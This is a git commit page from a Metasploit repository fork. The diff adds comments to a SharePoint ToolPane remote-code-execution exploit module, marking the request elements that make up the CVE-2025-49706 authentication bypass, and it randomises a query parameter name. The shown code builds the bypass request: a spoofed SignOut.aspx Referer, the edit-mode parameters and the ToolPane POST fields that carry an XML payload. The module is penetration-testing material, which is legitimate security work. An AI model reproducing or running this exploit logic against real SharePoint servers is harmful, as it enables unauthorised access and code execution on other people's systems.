adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add some comments to clarify what CVE-2025-49706 is

Browse Source
This commit is contained in:
sfewer-r7
2025-07-25 11:01:22 +01:00
parent a81710486e
commit 6d9d9a70d4
1 changed files with 4 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+4 -4
View File
@@ -299,14 +299,14 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
'ctype' => 'application/x-www-form-urlencoded',
'headers' => {
'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx') # This is part of CVE-2025-49706
},
'vars_get' => {
'DisplayMode' => 'Edit',
'a' => '/ToolPane.aspx'
'DisplayMode' => 'Edit', # This is part of CVE-2025-49706
Rex::Text.rand_text_alpha_lower(8..16) => '/ToolPane.aspx' # This is part of CVE-2025-49706
},
'vars_post' => {
'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')), # This is part of CVE-2025-49706
'MSOTlPn_DWP' => xml
}
)